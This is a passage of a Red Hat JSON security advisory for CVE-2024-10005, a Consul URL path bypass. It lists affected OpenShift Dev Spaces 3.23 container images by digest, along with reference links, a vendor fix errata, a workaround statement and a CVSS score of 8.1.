          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2024-10005"
        },
        {
          "category": "external",
          "summary": "RHBZ#2322857",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2322857"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2024-10005",
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-10005"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-10005",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10005"
        },
        {
          "category": "external",
          "summary": "https://discuss.hashicorp.com/t/hcsec-2024-22-consul-l7-intentions-vulnerable-to-url-path-bypass",
          "url": "https://discuss.hashicorp.com/t/hcsec-2024-22-consul-l7-intentions-vulnerable-to-url-path-bypass"
        }
      ],
      "release_date": "2024-10-30T21:19:22.576000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
